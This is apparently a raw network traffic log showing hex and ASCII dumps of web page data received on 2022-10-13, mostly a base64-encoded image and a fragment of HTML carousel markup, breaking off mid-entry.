                                                                                                                2022-10-13 11:08:11 UTC3975INData Raw: 41 42 49 6f 31 33 73 2b 6e 77 51 59 4f 7a 73 61 30 31 33 30 51 59 4f 52 63 2f 7a 41 30 4f 6a 49 43 77 4a 2b 5a 77 51 37 7a 38 55 47 4c 36 46 6f 71 67 42 75 64 2b 4b 44 79 35 51 41 48 49 68 6a 41 65 57 31 36 71 68 35 74 47 7a 6d 42 54 73 6f 4d 53 77 44 6a 6b 42 41 70 75 2f 4d 53 54 44 45 74 70 30 4b 41 2f 4d 35 61 41 4b 38 65 39 41 41 37 73 58 48 50 55 38 62 6f 43 43 64 51 53 61 41 36 78 39 71 41 45 43 54 2f 43 59 62 52 41 48 42 2b 55 79 59 5a 39 65 36 6f 31 76 7a 4f 44 38 73 75 42 72 4b 42 69 34 4c 47 58 6f 47 71 79 67 42 63 74 4d 67 74 61 58 5a 7a 32 51 45 6b 73 43 4e 4e 59 51 62 4a 78 46 41 57 59 68 49 4d 42 4e 70 4c 6b 6a 58 33 6f 41 61 73 5a 50 38 51 30 38 55 42 49 44 79 65 51 43 48 68 42 75 4d 58 74 4f 30 6f 42 4e 30 41 67 6a 78 51 46 36 37 53 7a 46
                                                                                                                Data Ascii: ABIo13s+nwQYOzsa0130QYORc/zA0OjICwJ+ZwQ7z8UGL6FoqgBud+KDy5QAHIhjAeW16qh5tGzmBTsoMSwDjkBApu/MSTDEtp0KA/M5aAK8e9AA7sXHPU8boCCdQSaA6x9qAECT/CYbRAHB+UyYZ9e6o1vzOD8suBrKBi4LGXoGqygBctMgtaXZz2QEksCNNYQbJxFAWYhIMBNpLkjX3oAasZP8Q08UBIDyeQCHhBuMXtO0oBN0AgjxQF67SzF
                                                                                                                2022-10-13 11:08:11 UTC3976INData Raw: 6a 6f 67 55 6b 7a 6b 4b 47 43 48 33 71 79 6f 4c 67 6d 58 67 77 67 78 33 64 70 64 2f 77 53 67 47 43 48 61 34 4d 61 38 56 30 51 61 6f 59 45 46 35 33 38 30 47 46 54 72 46 64 58 33 53 67 4f 37 68 6f 65 56 51 59 6d 70 71 42 50 4b 67 50 55 68 78 54 6f 6c 43 47 37 63 41 76 51 2f 42 41 44 63 35 6b 30 4c 52 30 51 4b 58 72 41 41 33 50 67 56 61 4d 34 71 4c 68 72 50 76 6a 73 70 52 6e 59 41 67 48 45 31 5a 4b 6a 41 42 69 41 53 43 37 50 31 55 6f 56 38 53 34 44 36 65 53 6f 42 4c 46 79 63 51 67 57 41 54 52 7a 2b 58 38 46 51 4c 72 67 59 49 63 42 2f 6d 71 67 6d 53 44 46 74 41 59 51 4b 5a 71 32 33 68 73 6c 43 45 6d 34 31 48 63 55 56 51 44 57 72 6b 31 4b 56 55 72 69 4b 55 71 79 55 53 79 6b 68 32 62 72 50 52 45 4b 37 53 50 77 2b 4b 43 64 31 32 6f 41 6f 57 43 43 64 78 5a 39 5a
                                                                                                                Data Ascii: jogUkzkKGCH3qyoLgmXgwgx3dpd/wSgGCHa4Ma8V0QaoYEF5380GFTrFdX3SgO7hoeVQYmpqBPKgPUhxTolCG7cAvQ/BADc5k0LR0QKXrAA3PgVaM4qLhrPvjspRnYAgHE1ZKjABiASC7P1UoV8S4D6eSoBLFycQgWATRz+X8FQLrgYIcB/mqgmSDFtAYQKZq23hslCEm41HcUVQDWrk1KVUriKUqyUSykh2brPREK7SPw+KCd12oAoWCCdxZ9Z
                                                                                                                2022-10-13 11:08:11 UTC3978INData Raw: 6c 7a 42 6e 47 71 44 70 74 4c 4e 31 6f 6f 4f 71 30 76 72 50 43 69 72 65 6d 53 64 5a 2b 31 46 58 74 75 49 44 62 77 6f 4c 32 33 4f 2f 77 41 55 46 78 64 39 36 69 71 41 6d 52 51 73 4a 51 57 74 75 37 63 78 70 45 71 43 77 4d 41 45 31 30 4b 43 74 74 7a 61 6e 2f 67 2f 63 6f 4b 51 61 41 6b 45 79 6d 46 46 38 57 44 78 32 56 35 30 4f 4c 67 58 62 65 67 35 31 68 52 54 69 34 51 4b 44 55 47 65 55 46 44 63 64 32 45 55 54 41 59 4f 4f 70 6c 6c 41 52 6f 43 57 65 6b 37 49 48 7a 44 5a 61 61 38 36 49 43 4c 74 54 70 54 69 75 69 42 37 54 4d 67 76 76 76 32 55 42 46 44 4d 6d 6f 4d 2f 59 71 43 51 51 50 7a 4e 73 58 5a 41 63 6a 30 69 70 70 4b 6b 42 59 55 59 63 39 48 51 46 6a 63 42 38 56 41 51 57 6d 6d 36 41 4f 78 66 51 37 30 39 36 6f 49 4c 36 73 47 59 4e 37 30 57 74 71 43 7a 4e 4c 69
                                                                                                                Data Ascii: lzBnGqDptLN1ooOq0vrPCiremSdZ+1FXtuIDbwoL23O/wAUFxd96iqAmRQsJQWtu7cxpEqCwMAE10KCttzan/g/coKQaAkEymFF8WDx2V50OLgXbeg51hRTi4QKDUGeUFDcd2EUTAYOOpllARoCWek7IHzDZaa86ICLtTpTiuiB7TMgvvv2UBFDMmoM/YqCQQPzNsXZAcj0ippKkBYUYc9HQFjcB8VAQWmm6AOxfQ7096oIL6sGYN70WtqCzNLi
                                                                                                                2022-10-13 11:08:11 UTC3979INData Raw: 49 6f 6c 74 57 63 43 54 39 79 45 62 4b 48 41 4c 6b 4a 42 6a 63 35 31 74 70 49 53 44 43 2b 63 5a 70 42 50 73 36 44 47 39 6e 4f 6d 34 31 6b 4b 6b 4e 6d 48 59 43 51 49 48 74 52 51 67 69 34 45 53 4f 49 36 49 4e 6b 41 4c 6d 44 39 74 58 32 53 44 43 68 66 6e 35 52 77 68 47 4d 45 79 65 41 48 68 43 4e 47 6f 4a 4c 46 30 49 50 79 67 44 78 48 43 45 59 36 6a 51 55 48 6e 43 45 44 35 58 41 59 38 41 52 79 68 47 64 71 30 70 54 33 6f 43 34 63 44 57 6e 61 76 64 49 42 45 4e 55 43 44 71 68 42 42 44 73 30 4e 52 43 43 43 38 30 66 56 43 46 46 77 66 38 78 4c 51 77 53 41 41 6d 66 6c 59 47 41 71 47 6f 4e 79 4e 54 30 33 55 49 41 75 64 34 2b 56 32 68 49 6a 41 75 4e 62 6e 41 6e 37 6b 56 68 63 34 6c 79 2b 75 6a 65 61 51 45 6d 42 45 2b 4a 51 62 4a 74 44 6f 6b 47 63 4f 78 50 4c 64 53 67
                                                                                                                Data Ascii: IoltWcCT9yEbKHALkJBjc51tpISDC+cZpBPs6DG9nOm41kKkNmHYCQIHtRQgi4ESOI6INkALmD9tX2SDChfn5RwhGMEyeAHhCNGoJLF0IPygDxHCEY6jQUHnCED5XAY8ARyhGdq0pT3oC4cDWnavdIBENUCDqhBBDs0NRCCC80fVCFFwf8xLQwSAAmflYGAqGoNyNT03UIAud4+V2hIjAuNbnAn7kVhc4ly+ujeaQEmBE+JQbJtDokGcOxPLdSg
                                                                                                                2022-10-13 11:08:11 UTC3980INData Raw: 71 67 78 4e 7a 53 58 4c 56 32 2b 35 46 61 52 4a 4f 54 6b 44 62 74 43 49 46 78 6c 74 52 72 33 51 59 44 2f 41 42 47 6e 74 35 6f 47 59 51 2f 59 61 42 52 53 74 52 74 44 35 61 4b 67 58 41 44 67 47 6f 30 52 42 63 58 4d 35 35 6b 54 30 55 47 39 69 44 52 4b 41 2b 72 49 56 75 41 65 35 71 67 42 5a 6e 59 66 4e 71 49 6f 55 52 68 41 63 6c 33 72 4b 44 4f 42 71 59 4e 61 49 41 34 49 4f 71 6f 58 4b 34 73 4b 78 4c 4f 2f 67 6b 44 42 69 48 42 69 6a 6f 46 4a 45 76 41 42 46 65 55 43 76 62 54 51 52 58 32 33 51 41 33 6e 62 47 51 32 74 4b 70 41 43 5a 4c 6e 68 68 35 49 46 79 59 45 69 32 6a 74 50 69 67 41 4a 61 48 48 58 70 6f 67 56 77 2b 70 64 33 4f 79 42 63 74 58 46 70 71 4f 53 72 42 72 69 51 78 71 61 4f 55 43 50 74 38 75 71 6f 6e 6b 78 41 46 52 54 58 68 41 4d 69 59 71 31 54 73 68
                                                                                                                Data Ascii: qgxNzSXLV2+5FaRJOTkDbtCIFxltRr3QYD/ABGnt5oGYQ/YaBRStRtD5aKgXADgGo0RBcXM55kT0UG9iDRKA+rIVuAe5qgBZnYfNqIoURhAcl3rKDOBqYNaIA4IOqoXK4sKxLO/gkDBiHBijoFJEvABFeUCvbTQRX23QA3nbGQ2tKpACZLnhh5IFyYEi2jtPigAJaHHXpogVw+pd3OyBctXFpqOSrBriQxqaOUCPt8uqonkxAFRTXhAMiYq1Tsh
                                                                                                                2022-10-13 11:08:11 UTC3982INData Raw: 4a 58 58 6d 64 6a 76 43 47 63 6f 33 58 4f 35 30 43 49 68 64 66 75 4b 4b 6a 6e 75 76 5a 32 4d 30 56 45 54 64 71 38 6f 69 46 39 31 5a 6f 67 35 37 37 6d 48 77 56 56 7a 5a 6c 31 55 63 4e 74 31 50 65 71 6a 6f 73 75 4c 42 34 55 46 37 4c 6d 67 39 30 56 30 32 33 39 31 46 64 46 74 39 43 37 63 71 52 46 37 62 6d 5a 76 46 42 57 32 2f 51 49 72 6f 73 76 31 4d 64 31 4d 34 46 78 63 31 54 47 67 31 55 46 52 63 78 50 76 52 56 42 64 73 31 5a 37 49 4c 32 33 75 50 65 38 4c 49 71 4c 74 6a 4f 70 66 33 6f 4b 69 34 47 6c 52 75 48 52 54 67 33 4e 76 75 46 46 55 46 35 59 61 63 4f 6b 46 42 63 31 53 65 71 43 67 76 65 6a 6b 61 2b 39 41 34 76 70 33 62 37 46 41 77 76 49 6f 78 47 79 51 4f 4c 6f 4c 44 37 55 44 67 78 6f 39 53 79 69 51 52 64 6b 4e 35 66 32 64 41 58 4a 42 71 52 2f 43 56 51 7a
                                                                                                                Data Ascii: JXXmdjvCGco3XO50CIhdfuKKjnuvZ2M0VETdq8oiF91Zog577mHwVVzZl1UcNt1PeqjosuLB4UF7Lmg90V02391FdFt9C7cqRF7bmZvFBW2/QIrosv1Md1M4Fxc1TGg1UFRcxPvRVBds1Z7IL23uPe8LIqLtjOpf3oKi4GlRuHRTg3NvuFFUF5YacOkFBc1SeqCgvejka+9A4vp3b7FAwvIoxGyQOLoLD7UDgxo9SyiQRdkN5f2dAXJBqR/CVQz
                                                                                                                2022-10-13 11:08:11 UTC3983INData Raw: 73 6c 41 63 53 78 30 45 61 79 6c 51 34 75 44 31 42 6d 54 31 53 71 46 31 78 45 37 4f 77 4e 55 51 7a 6b 53 33 73 55 71 67 34 48 51 43 4c 68 77 6c 51 32 51 33 63 36 48 72 30 52 51 66 61 66 77 53 6f 49 34 6f 4e 35 37 4a 56 41 58 57 67 45 77 77 71 79 71 44 44 6b 77 57 72 70 35 39 46 4b 72 43 30 35 45 67 37 2b 4b 56 47 62 45 41 56 48 69 6c 47 6b 66 4d 78 4a 62 35 62 64 65 36 4b 7a 69 31 33 31 31 45 56 54 6e 42 65 58 63 41 55 42 50 48 56 42 69 61 67 46 72 75 43 67 42 64 67 48 63 6d 6e 78 53 6f 4d 74 42 34 61 69 56 52 64 39 53 67 7a 6b 31 49 48 64 30 43 67 6d 76 44 6a 53 4f 55 51 53 53 53 39 57 45 6a 55 4a 52 67 66 65 4b 6c 46 42 6d 6b 73 39 55 71 4d 59 6c 36 55 46 45 71 69 38 55 59 74 72 4d 39 45 41 69 42 74 4c 4d 6c 51 64 6e 50 77 53 67 45 69 67 75 59 76 52 33
                                                                                                                Data Ascii: slAcSx0EaylQ4uD1BmT1SqF1xE7OwNUQzkS3sUqg4HQCLhwlQ2Q3c6Hr0RQfafwSoI4oN57JVAXWgEwwqyqDDkwWrp59FKrC05Eg7+KVGbEAVHilGkfMxJb5bde6Kzi1311EVTnBeXcAUBPHVBiagFruCgBdgHcmnxSoMtB4aiVRd9Sgzk1IHd0CgmvDjSOUQSSS9WEjUJRgfeKlFBmks9UqMYl6UFEqi8UYtrM9EAiBtLMlQdnPwSgEiguYvR3
                                                                                                                2022-10-13 11:08:11 UTC3984INData Raw: 65 34 69 55 4b 57 41 51 50 47 4b 36 49 67 45 67 77 77 36 66 64 43 41 45 68 2b 75 33 6a 35 6f 73 42 77 41 52 49 32 30 51 49 62 70 63 33 54 6f 64 45 43 6d 34 45 45 73 34 33 6f 6b 43 35 42 32 33 6f 56 51 6c 31 34 64 69 57 71 67 42 75 44 49 49 6d 2f 61 4e 39 61 39 46 59 46 4a 42 63 6d 57 33 51 49 39 44 34 6b 6c 45 4b 62 77 4a 4a 5a 30 68 55 7a 65 43 33 4e 46 59 49 6d 37 58 66 54 70 34 49 69 5a 75 49 47 35 4b 6f 6e 64 64 4c 41 73 59 4a 52 55 37 69 34 4c 2b 33 69 69 4a 58 58 41 51 49 4e 52 76 73 71 69 4a 76 30 50 62 5a 49 49 33 58 69 70 4c 62 42 55 53 4e 77 4c 37 49 49 47 34 67 45 50 33 56 35 30 53 75 4c 63 73 69 6f 58 58 62 39 46 52 7a 33 58 42 32 48 73 45 52 47 36 34 4e 57 6c 56 52 7a 33 58 55 59 7a 75 72 68 45 63 6b 48 6d 32 33 6b 36 30 57 6d 56 37 62 69 57
                                                                                                                Data Ascii: e4iUKWAQPGK6IgEgww6fdCAEh+u3j5osBwARI20QIbpc3TodECm4EEs43okC5B23oVQl14diWqgBuDIIm/aN9a9FYFJBcmW3QI9D4klEKbwJJZ0hUzeC3NFYIm7XfTp4IiZuIG5KonddLAsYJRU7i4L+3iiJXXAQINRvsqiJv0PbZII3XipLbBUSNwL7IIG4gEP3V50SuLcsioXXb9FRz3XB2HsERG64NWlVRz3XUYzurhEckHm23k60WmV7biW
                                                                                                                2022-10-13 11:08:11 UTC3986INData Raw: 47 46 2b 68 39 6e 52 56 63 77 64 5a 30 64 51 4f 4c 36 73 65 55 44 35 55 6e 75 67 65 33 31 4a 63 6c 67 70 42 51 45 38 65 35 51 4d 4c 67 58 47 6f 30 56 42 66 6f 32 6f 52 54 5a 46 6f 39 76 46 41 34 76 4a 31 61 56 49 47 7a 35 33 59 38 6f 43 4c 79 77 32 33 51 4f 37 69 5a 32 5a 41 52 63 54 55 68 7a 48 64 49 44 6b 38 61 62 61 4a 41 34 75 59 39 56 41 54 65 51 38 4d 42 73 69 6d 46 2b 4c 43 55 51 63 72 71 6a 58 79 51 48 49 47 6f 66 34 49 4d 4c 67 48 64 79 66 74 51 4d 51 44 4d 42 34 64 42 67 48 63 76 48 67 67 32 67 30 5a 68 75 67 61 58 68 36 71 4b 58 4c 53 72 43 61 45 71 6f 4a 49 6f 34 5a 6f 62 7a 51 46 7a 51 45 47 37 64 41 48 64 2f 6c 72 74 37 62 49 4e 6c 71 32 72 6f 48 7a 63 50 33 71 6f 72 5a 6d 52 6f 42 54 68 55 46 79 34 6e 71 69 4e 4d 48 78 30 4b 41 69 39 34 41
                                                                                                                Data Ascii: GF+h9nRVcwdZ0dQOL6seUD5Unuge31JclgpBQE8e5QMLgXGo0VBfo2oRTZFo9vFA4vJ1aVIGz53Y8oCLyw23QO7iZ2ZARcTUhzHdIDk8abaJA4uY9VATeQ8MBsimF+LCUQcrqjXyQHIGof4IMLgHdyftQMQDMB4dBgHcvHgg2g0ZhugaXh6qKXLSrCaEqoJIo4ZobzQFzQEG7dAHd/lrt7bINlq2roHzcP3qorZmRoBThUFy4nqiNMHx0KAi94A
                                                                                                                2022-10-13 11:08:11 UTC3987INData Raw: 68 47 57 67 71 46 51 6e 31 44 55 78 4c 54 35 49 42 64 63 42 71 77 34 70 30 51 4c 6b 59 59 64 52 78 6f 71 41 39 78 6c 32 34 55 35 41 70 75 59 6b 6d 61 79 2b 79 71 55 75 5a 72 52 36 62 52 79 67 58 36 6e 64 79 67 58 36 6a 4f 36 42 44 63 61 6b 6f 45 79 32 4c 6b 56 56 43 5a 50 77 7a 4f 4e 45 43 47 2b 68 31 6f 67 53 36 36 34 69 72 4b 6f 51 33 61 48 73 32 33 5a 41 68 39 53 66 65 55 52 4d 2b 6f 57 35 56 45 6a 65 41 4b 77 50 77 51 54 75 76 4c 78 75 35 4c 6f 4a 47 2b 75 35 56 43 47 36 5a 50 6d 67 6d 62 2f 4e 42 47 36 2f 62 73 4e 46 52 47 37 31 44 32 6e 75 67 6b 62 30 45 54 63 33 44 68 56 45 62 72 77 2f 49 56 52 47 36 35 35 4d 6b 61 71 38 77 6a 66 36 6e 6b 6d 42 43 36 36 4a 56 52 47 36 39 6b 67 6a 64 65 71 4a 5a 6f 4f 4b 32 35 45 57 46 77 4b 69 71 57 33 46 55 57 74
                                                                                                                Data Ascii: hGWgqFQn1DUxLT5IBdcBqw4p0QLkYYdRxoqA9xl24U5ApuYkmay+yqUuZrR6bRygX6ndygX6jO6BDcakoEy2LkVVCZPwzONECG+h1ogS664irKoQ3aHs23ZAh9SfeURM+oW5VEjeAKwPwQTuvLxu5LoJG+u5VCG6ZPmgmb/NBG6/bsNFRG71D2nugkb0ETc3DhVEbrw/IVRG655Mkaq8wjf6nkmBC66JVRG69kgjdeqJZoOK25EWFwKiqW3FUWt
                                                                                                                2022-10-13 11:08:11 UTC3988INData Raw: 62 5a 56 61 4a 75 33 4a 5a 2f 67 68 54 69 37 57 70 55 41 46 32 34 62 65 58 56 67 62 4a 39 65 36 67 4f 62 4f 4f 2b 79 42 73 67 35 4c 76 78 30 52 52 46 7a 42 68 42 61 57 52 41 79 67 68 32 65 4a 31 43 42 68 63 7a 44 77 66 52 46 45 33 68 6f 49 66 78 49 52 47 46 77 67 78 79 67 4f 6f 59 4d 77 5a 76 76 51 44 4a 32 30 36 49 47 65 30 36 74 34 68 51 41 6b 46 68 57 5a 5a 55 45 33 61 45 78 4d 4b 41 75 30 31 49 31 4b 6f 41 75 6b 53 2b 38 6f 4d 2b 72 39 64 6e 51 59 45 41 6b 67 38 4d 36 4b 77 67 45 4f 57 31 52 47 64 79 34 4c 41 63 31 51 59 46 6e 41 4d 6a 6c 42 69 66 38 72 53 62 6e 41 51 59 6b 62 74 4c 48 6c 42 67 51 38 45 2b 78 52 51 64 71 33 61 79 69 4d 34 41 61 47 61 69 44 50 45 42 2b 73 6f 41 38 48 51 42 79 34 36 49 42 6b 47 6f 78 6f 45 42 7a 74 72 44 53 2f 4c 6f 41
                                                                                                                Data Ascii: bZVaJu3JZ/ghTi7WpUAF24beXVgbJ9e6gObOO+yBsg5Lvx0RRFzBhBaWRAygh2eJ1CBhczDwfRFE3hoIfxIRGFwgxygOoYMwZvvQDJ206IGe06t4hQAkFhWZZUE3aExMKAu01I1KoAukS+8oM+r9dnQYEAkg8M6KwgEOW1RGdy4LAc1QYFnAMjlBif8rSbnAQYkbtLHlBgQ8E+xRQdq3ayiM4AaGaiDPEB+soA8HQBy46IBkGoxoEBztrDS/LoA
                                                                                                                2022-10-13 11:08:11 UTC3990INData Raw: 39 58 56 52 78 69 35 2f 74 52 46 41 55 56 55 58 4b 4b 73 4c 34 51 56 46 35 30 55 46 52 63 2f 43 42 78 63 52 30 52 46 62 62 71 61 6f 71 77 76 4b 67 72 62 66 6f 37 71 43 6f 75 6b 4e 43 43 67 76 4c 54 6f 69 72 57 33 71 42 37 62 39 45 46 68 66 44 61 72 4b 71 57 33 38 6f 4b 43 39 42 51 58 53 37 71 4b 63 58 76 58 52 42 51 58 76 72 41 54 6d 46 4d 77 4a 4b 43 67 76 31 33 55 67 63 58 74 39 36 42 78 64 44 75 32 71 42 68 64 56 41 34 75 4e 4f 79 42 68 36 6e 4e 4b 6c 51 4f 4c 2b 57 6d 55 44 35 70 41 32 54 30 4c 37 75 6f 70 68 65 30 76 30 51 4f 4c 71 36 62 6e 58 5a 41 77 76 65 44 30 5a 41 58 41 4d 53 67 59 46 79 4f 4a 51 6f 35 45 45 42 78 50 69 69 69 4c 79 44 57 45 44 6d 2f 56 2b 46 41 66 71 51 37 39 47 56 42 7a 71 42 72 48 52 51 4d 4c 7a 44 6d 58 6b 68 49 4e 6d 54 32
                                                                                                                Data Ascii: 9XVRxi5/tRFAUVUXKKsL4QVF50UFRc/CBxcR0RFbbqaoqwvKgrbfo7qCoukNCCgvLToirW3qB7b9EFhfDarKqW38oKC9BQXS7qKcXvXRBQXvrATmFMwJKCgv13UgcXt96BxdDu2qBhdVA4uNOyBh6nNKlQOL+WmUD5pA2T0L7uophe0v0QOLq6bnXZAwveD0ZAXAMSgYFyOJQo5EEBxPiiiLyDWEDm/V+FAfqQ79GVBzqBrHRQMLzDmXkhINmT2
                                                                                                                2022-10-13 11:08:11 UTC3991INData Raw: 68 54 65 4a 39 36 4b 6d 62 33 52 45 7a 66 75 2f 42 71 71 45 4e 30 6c 2f 46 41 6d 62 38 6f 45 4e 2b 79 49 6b 62 33 37 4b 69 5a 39 53 4b 73 67 6e 64 64 58 66 64 55 49 62 75 53 67 6d 62 76 4c 52 56 4b 6d 62 36 67 49 4a 58 58 2b 43 52 45 72 72 39 6c 52 49 33 2b 53 6f 6d 62 74 61 49 69 5a 75 51 53 4e 33 45 6f 4a 6d 39 56 55 6a 65 67 6b 62 69 66 73 56 52 4d 33 42 42 4b 36 39 45 54 7a 6d 71 6f 35 41 56 52 55 58 49 48 46 31 50 65 6f 4b 69 38 4a 42 59 58 4b 51 4f 43 69 71 57 33 49 4b 43 37 37 6c 42 59 58 71 4b 6f 4c 74 58 52 46 42 64 79 67 63 58 49 4b 32 33 37 61 71 5a 56 53 32 2f 37 30 46 52 66 2b 4b 67 70 62 65 64 2f 46 42 51 58 6a 77 52 61 63 58 61 2b 61 42 78 66 30 36 4b 4b 6f 50 56 69 76 56 49 4b 57 33 78 56 6c 42 51 58 2b 58 76 53 42 78 66 76 52 51 4f 4c 74
                                                                                                                Data Ascii: hTeJ96Kmb3REzfu/BqqEN0l/FAmb8oEN+yIkb37KiZ9SKsgnddXfdUIbuSgmbvLRVKmb6gIJXX+CRErr9lRI3+SombtaIiZuQSN3EoJm9VUjegkbifsVRM3BBK69ETzmqo5AVRUXIHF1PeoKi8JBYXKQOCiqW3IKC77lBYXqKoLtXRFBdygcXIK237aqZVS2/70FRf+Kgpbed/FBQXjwRacXa+aBxf06KKoPVivVIKW3xVlBQX+XvSBxfvRQOLt
                                                                                                                2022-10-13 11:08:11 UTC3992INData Raw: 54 4b 69 6c 4e 34 4b 49 58 36 6d 6a 73 71 70 44 65 41 50 67 69 45 4e 34 30 38 56 51 70 76 4c 31 70 6f 6f 46 79 4a 31 56 35 41 68 75 42 6b 31 32 51 41 33 67 4d 69 45 4e 35 6e 56 41 68 76 6e 64 41 68 76 34 56 45 7a 36 6a 6f 4a 6d 2f 74 6f 67 51 33 6e 52 55 49 62 39 30 53 6b 4e 36 74 52 4d 33 6f 4a 6d 38 62 6f 4a 6d 39 55 54 4e 37 38 6f 45 4e 33 4b 43 5a 75 32 38 55 71 45 4e 79 70 45 7a 66 79 69 70 47 35 55 54 4e 36 43 5a 4c 6f 69 5a 75 52 45 37 72 31 52 49 33 63 6f 4a 6d 37 37 67 71 4a 6d 35 55 49 2f 4b 67 35 77 56 55 55 46 79 67 5a 41 2b 55 4a 46 55 46 31 46 41 34 75 2f 46 55 56 74 75 55 7a 67 56 46 79 69 71 41 6f 47 46 78 43 43 67 76 42 55 56 51 58 63 6f 4b 43 34 62 39 6c 42 51 58 63 70 41 34 75 6f 69 48 46 33 33 6f 48 46 79 69 71 43 2b 6b 75 64 30 44 69
                                                                                                                Data Ascii: TKilN4KIX6mjsqpDeAPgiEN408VQpvL1pooFyJ1V5AhuBk12QA3gMiEN5nVAhvndAhv4VEz6joJm/togQ3nRUIb90SkN6tRM3oJm8boJm9UTN78oEN3KCZu28UqENypEzfyipG5UTN6CZLoiZuRE7r1RI3coJm77gqJm5UI/Kg5wVUUFygZA+UJFUF1FA4u/FUVtuUzgVFyiqAoGFxCCgvBUVQXcoKC4b9lBQXcpA4uoiHF33oHFyiqC+kud0Di
                                                                                                                2022-10-13 11:08:11 UTC3994INData Raw: 69 47 4a 37 4b 68 43 54 73 69 46 4a 4f 78 52 55 33 75 61 68 62 6f 67 51 6d 2f 59 71 6f 6b 53 64 70 54 41 56 7a 73 71 45 4a 4f 78 4b 49 55 6b 36 43 4f 46 42 4e 7a 73 71 70 43 54 4d 46 42 4d 6b 37 46 55 54 4a 4f 67 4b 71 45 4a 4f 71 4b 51 6c 45 49 53 5a 67 6f 4a 45 6e 5a 56 45 79 54 73 55 43 45 6e 62 75 69 70 6b 6e 59 39 56 55 49 58 51 49 54 77 69 45 4a 50 4c 6f 46 6e 6c 55 66 2f 32 51 3d 3d 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 64 2d 62 6c 6f 63 6b 20 6d 79 2d 30 20 6d 78 2d 61 75 74 6f 20 6f 76 65 72 66 6c 6f 77 2d 68 69 64 64 65 6e 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 39 34 30 70 78 3b 20 68 65 69 67 68 74 3a 20 33 37 30 70 78 3b 20 63 6c
                                                                                                                Data Ascii: iGJ7KhCTsiFJOxRU3uahbogQm/YqokSdpTAVzsqEJOxKIUk6COFBNzsqpCTMFBMk7FUTJOgKqEJOqKQlEISZgoJEnZVEyTsUCEnbuipknY9VUIXQITwiEJPLoFnlUf/2Q=="> </div> <div class="position-relative d-block my-0 mx-auto overflow-hidden" style="width: 940px; height: 370px; cl
                                                                                                                2022-10-13 11:08:11 UTC3995INData Raw: 66 39 4f 35 6c 38 43 79 32 31 68 49 6b 54 33 74 62 7a 6d 47 43 51 34 63 75 2b 2f 50 56 75 77 77 69 39 39 72 39 67 59 39 48 74 32 37 31 36 6d 54 6e 57 52 78 49 6a 6f 55 4f 39 35 37 31 47 39 74 42 72 68 32 36 4e 31 38 72 6c 48 31 4a 67 44 75 33 62 76 62 70 34 38 45 68 61 70 77 70 52 30 42 45 50 31 69 42 4c 30 33 2b 39 4f 52 72 6c 52 4c 4e 78 66 38 48 35 66 6d 74 57 7a 65 57 37 32 48 37 77 4c 4f 65 47 59 70 6d 33 77 2b 32 65 2f 43 46 32 67 66 4e 37 63 66 58 53 6d 58 58 45 79 51 44 2b 37 43 50 57 74 34 2b 77 4c 6f 68 75 41 35 30 37 2b 42 32 4c 37 35 4d 64 39 69 72 39 65 4e 72 74 66 4a 55 34 50 75 48 57 7a 33 55 38 76 61 68 62 34 6a 56 51 32 64 39 2b 6e 4c 30 72 30 74 32 2b 30 7a 6f 6f 42 64 66 71 35 56 74 42 6f 65 6c 2f 6c 30 50 74 64 77 35 31 4a 6e 59 4e 41
                                                                                                                Data Ascii: f9O5l8Cy21hIkT3tbzmGCQ4cu+/PVuwwi99r9gY9Ht2716mTnWRxIjoUO9571G9tBrh26N18rlH1JgDu3bvbp48EhapwpR0BEP1iBL03+9ORrlRLNxf8H5fmtWzeW72H7wLOeGYpm3w+2e/CF2gfN7cfXSmXXEyQD+7CPWt4+wLohuA507+B2L75Md9ir9eNrtfJU4PuHWz3U8vahb4jVQ2d9+nL0r0t2+0zooBdfq5VtBoel/l0Ptdw51JnYNA
                                                                                                                2022-10-13 11:08:11 UTC3996INData Raw: 4d 39 4a 6e 71 78 42 66 57 64 64 65 4b 69 73 36 4c 38 4a 31 56 2b 79 52 5a 48 75 79 39 64 71 35 58 59 6b 47 75 4e 46 6d 4f 52 76 55 64 37 54 6d 4f 59 39 48 50 43 46 73 51 4a 37 4b 2f 4b 39 77 34 77 41 2f 68 4c 77 75 45 33 73 78 50 30 66 46 77 47 44 62 44 34 55 2b 46 71 74 34 4f 41 79 72 4d 48 6a 4a 45 2f 48 30 6f 49 6d 34 49 48 34 44 71 56 72 48 4a 58 69 75 34 61 53 66 6a 78 6d 43 45 50 4a 2b 45 4c 54 2f 49 62 67 32 44 72 45 52 68 6f 32 4a 49 4c 58 51 6e 67 45 44 63 6b 64 47 6f 4e 4d 75 31 70 6c 50 49 52 63 43 43 45 67 4f 34 78 56 55 71 67 69 38 61 55 69 78 59 33 41 63 54 64 4b 6b 66 79 39 6a 73 48 6c 41 4a 50 55 66 75 52 6c 50 4f 68 49 64 6e 48 48 36 38 4a 56 68 73 64 64 39 48 50 63 35 55 5a 38 6b 53 41 47 4d 4e 73 51 48 76 74 55 46 45 73 6b 54 66 4a 34
                                                                                                                Data Ascii: M9JnqxBfWddeKis6L8J1V+yRZHuy9dq5XYkGuNFmORvUd7TmOY9HPCFsQJ7K/K9w4wA/hLwuE3sxP0fFwGDbD4U+Fqt4OAyrMHjJE/H0oIm4IH4DqVrHJXiu4aSfjxmCEPJ+ELT/Ibg2DrERho2JILXQngEDckdGoNMu1plPIRcCCEgO4xVUqgi8aUixY3AcTdKkfy9jsHlAJPUfuRlPOhIdnHH68JVhsdd9HPc5UZ8kSAGMNsQHvtUFEskTfJ4
                                                                                                                2022-10-13 11:08:11 UTC3998INData Raw: 30 63 70 58 45 45 33 73 6f 41 2b 4c 45 33 51 55 4f 78 37 43 49 4a 4f 42 69 53 42 41 63 6b 73 48 71 6c 66 45 51 68 6b 42 43 76 71 51 2b 69 4f 35 6a 55 6c 33 37 47 62 4a 41 39 7a 47 65 72 48 78 66 33 31 45 38 4a 4c 4c 53 59 34 71 35 42 31 47 64 4d 33 30 33 48 70 71 51 6f 76 4d 62 42 71 4f 67 50 59 6a 75 62 6d 41 76 61 59 38 78 67 51 4a 62 42 37 78 50 70 66 44 30 45 73 77 70 66 78 43 43 38 73 50 51 32 51 41 65 70 4d 75 43 39 68 47 75 4b 58 75 49 4c 73 76 55 63 4a 30 2b 6c 42 30 49 6d 55 36 6a 73 38 46 34 52 4a 6e 35 54 6b 4f 47 54 46 37 30 6d 6e 69 51 72 73 51 70 4a 69 58 43 4a 6f 50 49 2f 46 5a 38 4c 68 73 35 2b 78 65 79 77 65 7a 